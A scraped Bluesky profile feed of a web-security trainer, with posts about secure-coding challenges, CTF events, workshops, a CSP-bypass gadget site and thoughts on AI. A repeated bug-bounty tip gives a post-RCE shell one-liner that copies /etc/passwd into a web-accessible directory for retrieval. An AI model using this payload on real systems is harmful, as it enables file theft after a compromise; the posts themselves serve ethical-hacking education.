Adam Langley
@buildhacksecure.bsky.social
Fullstack dev & Hacker, training ethical hackers how to hack & web devs to secure their apps! CTO at https://hackinghub.io and Director at https://bsidesexeter.co.uk
Secure Coding Challenge…
What is insecure about this code? And how would you extract a file? For example /etc/passwd
What is insecure about this code? And how would you extract a file? For example /etc/passwd
February 3, 2025 at 11:25 PM
Secure Coding Challenge…
What is insecure about this code? And how would you extract a file? For example /etc/passwd
What is insecure about this code? And how would you extract a file? For example /etc/passwd
Reposted by Adam Langley
If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.
January 15, 2025 at 5:56 PM
If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.
Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?
All you need to know is a uniue filename in the webroot.
$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )
#bugbountytips #hacking
All you need to know is a uniue filename in the webroot.
$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )
#bugbountytips #hacking
January 9, 2025 at 11:21 AM
Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?
All you need to know is a uniue filename in the webroot.
$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )
#bugbountytips #hacking
All you need to know is a uniue filename in the webroot.
$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )
#bugbountytips #hacking
Merry Christmas!
December 25, 2024 at 7:36 AM
Merry Christmas!
I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...
December 20, 2024 at 12:16 PM
I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...
Reposted by Adam Langley
Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.
December 10, 2024 at 7:37 PM
Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.
Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"
December 9, 2024 at 10:21 AM
Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"
2 Hours in and weirdly not tired. Just covered our SQL Injection module.
Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!
December 4, 2024 at 12:01 AM
2 Hours in and weirdly not tired. Just covered our SQL Injection module.
Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!
December 4, 2024 at 12:00 AM
Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!
Reposted by Adam Langley
Hey BlueSky!
I case you missed it:
I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.
It already contains a bunch of useful gadgets with contributions from your favourite hackers.
If you have some CSP bypasses to share, feel free to contribute!
I case you missed it:
I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.
It already contains a bunch of useful gadgets with contributions from your favourite hackers.
If you have some CSP bypasses to share, feel free to contribute!
November 14, 2024 at 2:57 PM
Hey BlueSky!
I case you missed it:
I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.
It already contains a bunch of useful gadgets with contributions from your favourite hackers.
If you have some CSP bypasses to share, feel free to contribute!
I case you missed it:
I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.
It already contains a bunch of useful gadgets with contributions from your favourite hackers.
If you have some CSP bypasses to share, feel free to contribute!
I'm delivering a talk about web app security ( or the lack of it ) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of Decemeber! See yowcon.com for more detail.
November 15, 2024 at 4:33 PM
I'm delivering a talk about web app security ( or the lack of it ) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of Decemeber! See yowcon.com for more detail.
Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php
November 14, 2024 at 9:07 AM
Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php